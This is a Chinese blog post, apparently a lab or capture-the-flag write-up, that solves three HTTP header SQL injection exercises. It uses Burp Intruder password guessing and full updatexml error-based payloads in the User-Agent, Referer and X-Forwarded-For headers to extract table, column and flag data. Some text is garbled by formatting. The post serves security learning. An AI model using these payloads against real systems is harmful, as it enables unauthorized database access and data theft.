header注入练习

最新推荐文章于 2024-05-24 08:00:00 发布
最新推荐文章于 2024-05-24 08:00:00 发布
阅读量229 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_60777183/article/details/119921370
版权
本文详细介绍了如何利用SQL注入技术,从登录验证绕过到数据库信息获取的过程。通过Burp Suite工具,演示了密码爆破、数据库名、表名和字段名的探测,最终揭示了敏感数据。内容包括头注入、报错注入等方法,适用于网络安全研究和防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

第一题:
1.判断注入方法。
看源码,因为用户名密码处用正则表达式过滤,禁止了\号的输入,所以查看其它可以注入的地方。 u a g e n t 处 可 以 做 h e a d 注 入 。 要 执 行 h e a d 注 入 , 必 须 uagent处可以做head注入。要执行head注入,必须 uagentheadheadrow有数据,即登录成功时才可。这也跟Head注入一般都需要用户名密码登录成功才能注入的常识吻合

2.得到用户名密码
用Burp抓包:打开burp,输入账户admin,密码胡乱输入,提交→进burp,Intruder.Positions→Clear→把要跑的部分选中(这里选中胡乱输入的密码部分)→Add→点Payloads.Load,选择自己想加载的字典(成功的话在右边文本框会显示)→点最上面菜单栏的Instruder.Start attact(开始用字典里面的东西替换数据包,通过Length和Status不同,排序找到不一样的,选中此行,点击Response.Raw,从代码行中找到汉字提示,如提示登录成功,则为跑出来的正确密码)。通过上述方法获得用户名密码之一为admin,123456

3.用报错注入判断库名
**
报错注入原理:因为路径的不存在等原因,产生报错,从报错提示中获得想要的数据。最常见最有名的报错注入——updatexml()。格式:updatexml(目标xml内容,xml文档路径,更新的内容)使用举例:updatexml(1,concat(‘’,database()),1),因为会报错并且database()优先执行,所以会报出database()库名。
**
源码:
INSERT INTO uagent(‘uagent’,’username’) VALUES(‘ u a g e n t ’ , ’ uagent’,’ uagent,uname’)

$uagent=1’ and updatexml(1,concat(‘~’,database()),1) ,’1’)— qwe

可以用插件,name处输入User-Agent,Value处输入 1’ and updatexml(1,concat(‘~’,database()),1) ,’1’)— qwe
得出报错:
XPATH syntax error: ‘~head_error’,
所以库名为head_error(其实得到库名与否没太大意义,后面用database()替代了。)

4.判断表名。
用插件,name处输入User-Agent,Value处输入1’ and updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database()) ),1) ,’1’)— qwe
用户名密码输入admin 123456,提交,得出报错:Subquery returns more than 1 row
错误原因是字符串不止一行,加limit再试一下。
1’ and updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 0,1) ),1) ,’1’)— qwe
得到报错:XPATH syntax error: ‘~flag_head’,
所以表名为flag_head5.判断字段名。
用插件,name处输入User-Agent,Value处输入1’ and updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=’flag_head’ limit 1,1) ),1) ,’1’)— qwe
得到报错:XPATH syntax error: ‘~flag_h1’,
所以字段名为flag_h1

6.寻找具体数据.
用插件,name处输入User-Agent,Value处输入1’ and updatexml(1,concat(‘~’,(select flag_h1 from flag_head limit 0,1) ),1) ,’1’)— qwe
得到报错: error: ‘~zKaQ-YourHd’
此题答案为zKaQ-YourHd
改变limit,得到其他答案:zKaQ-Refer 等

第二题:原理同题目一,先burp跑密码跑出admin 123456。
再用插件,name处输入REFERER,然而插件不生效了。换burp手动注入。代码跟题目一完全相同。
得到表名为flag_head。字段名为flag_h1。zKaQ-YourHd为答案之一。

第三题:
X_FORWARDED_FOR
用插件,偷个懒就猜之前的表名字段名都一样,直接复制1’ and updatexml(1,concat(‘~’,(select flag_h1 from flag_head limit 0,1) ),1) ,’1’)— qwe
出答案:zKaQ-YourHd

【漏洞挖掘】——124、Update型注入刨析
Fly_鹏程万里
06-28 186
Update型注入即可控的注入点出现在update语句中,例如:下面的语句用于向更新数据表中的信息,如果此处的value值来自用户且未经过滤处理,则存在SQL注入攻击风险。
Header注入
笔墨稠思
11-06 2078
靶场 当我们使用get/post注入,发现特殊的符号或单词被设置了检测,被办了,我们可以尝试检测是否存在Header注入 什么是Header注入? 我们网页,在向服务器发送请求时,会携带一些信息 如图所示,Request Headers 这部分都是请求头,这里面有一部分记录的是浏览器与服务器的链接状态,还有一些是记录我们的用户信息 例如:User-Agent 记录了我们当前操作系统,浏览器内核版本 Referer记录了我们的来源 当然,请求头中内容不仅仅是这些,还可能存在cookie http-X-Fo
Head注入
monkey:的博客
11-19 326
head 注入
晨辰.的博客
03-21 5525
Head 注入
openresty http2.0下raw_header不支持问题
whoami
01-06 2964
openresty http2.0下raw_header不支持问题
记web学习之sql注入
weixin_45508323的博客
11-22 1235
记我滴web学习--sql注入前言对sql注入原理的理解工具页面请求方式与注释请求方式:GET和POSTGET请求POST请求hackbarburp suite注释方式:#和--+判断注入点 前言 第一次写博客0.0,尝试梳理记录一下自己学习的知识点,也方便日后复习叭。 如果能帮到有需要的人那可真是太好了。 对sql注入原理的理解 sql 注入:即通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我认为sql注入就是将要注入的sql命令置于表单
搭建RHEL-7 SQLi-Labs平台,实践SQL注入练习
SQLi-Labs是一个专业的SQL注入练习平台,可用于GET和POST场景,其中包括多种类型的注入漏洞。 首先,SQLi-Labs提供了基于错误的注入(Union Select)和基于误差的注入(双查询注入)等注入漏洞练习。这些练习旨在...
Pikachu漏洞练习平台之SQL注入
ranuy阮的博客
02-27 2108
0x00 Pikachu Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 项目地址:https://github.com/zhuifengshaonianhanlu/pikachu 0x01 数字型注入(post) 界面如下 使用burpsuite抓包 POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1 Host: 127.0...
SQL注入:pikachu靶场中的SQL注入通关
最新发布
qq_68163788的博客
05-24 4151
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
使用sqlmap对OWASP靶机进行sql注入练习操作实例展示
热门推荐
WEL测试
03-30 1万+
前置条件 靶机:OWASP_Broken_Web_Apps_VM_0.94 靶机IP:192.168.88.138 初始密码是:root/owaspbwa kali安装的镜像为:kali-linux-2019.1a-amd64.iso KaliIP为:192.168.88.132 使用sqlmap进行sql注入 网站为:http://192.168.88.138 故意在输入...
head注入(一)
qq_45300786的博客
07-06 3829
head(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-07/index.php 攻击流程:     1;正确登录时用burp抓包。     2;测试head部分是否存在漏洞。     3;获取信息。   测试开始:     测试目标获取管理员账号密码     一些需要提前掌握的函数 order by 原为排序,注入式用来判断字段数 union select 用来判断显示位置,和链表查询(需相同字段数量) information_schema mysql自带数据库
Http Header注入
qq_45680080的博客
11-03 778
什么是Http Header注入 一个SQL注入的场景: 有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证) 或者通过http header头信息获取客户端的一些信息,比如客户端的IP地址、useragent、accept字段等等。 K会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑,则可能会导致基于http header的SQL...
学习记录-header注入(手工注入
SmileAndFun的博客
07-15 551
学习记录-header注入(手工注入)-利用致命报错进行注入 注:本文只用于学术交流,不用于其它用途,不足之处,评论之处,谢谢大佬们 一、header注入概念 php中存在许多预定义变量 , $_get、$_post、$_cookie 、$_SERVER等,包含多种信息,$SERVER包含了头部信息等,很多网站需要记录头部信息,存入数据库,通过对头部信息字段的修改注入,完成对数据库的渗透,这个就可以称为header注入。需要注意的是很多网站记录的是用户ip,这个中间存在代理,所以需要多次尝试新增字段信息同时
$_SERVER详解
lky_for_lucky的博客
12-16 1434
Brush $_SERVER详解 $_SERVER[‘HTTP_ACCEPT_LANGUAGE’]//浏览器语言 $_SERVER[‘REMOTE_ADDR’] //当前用户 IP 。 $_SERVER[‘REMOTE_HOST’] //当前用户主机名 $_SERVER[‘REQUEST_URI’] //URL $_SERVER[‘REMOTE_PORT’] //端口。 $_SERVER[‘SERVER_NAME’] //服务器主机的名称。 $_SERVER[‘PHP_SELF’]//正在执行脚本的文件名
HTTP头注入发现方法(有案例)
大方子
08-15 7734
0x0:概述       作者:暗月 博客:www.moonsec.com       关于这类注入点,传统的web漏洞扫描器,基本上是针对GET/POST注入,       对于这类注入的检测就变得有心无力了。 0x01:发现        0x01.1:常见http可能被污染的参数有这些 User-agent 浏览器版本 (少) Referer      来源(少) X-For...
渗透测试基础-HEAD注入
weixin_45488495的博客
04-08 1193
渗透测试基础-HEAD注入PHP的超全局变量 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 在讲解HEAD注入前,得明白一些前提知识:PHP的超全局变量 PHP的超全局变量 在php中的许多预定义变量都是“超全局的”,这意味着他们在一个脚本的全部作用域中都可以使用。 创建的一些超全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取 $_POST (获取POST传参) $_GET (获
js把值存在header
weixin_34110749的博客
11-12 426
a. 实例化对象:var head = new Headers(); b. 存值: head.append('name','lee'); 取值:console.log(head.get('name')); 输出:lee 本文转自 Lee_吉 51CTO博客,原文链接:http://blog.51cto.com/12173069/2066640...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值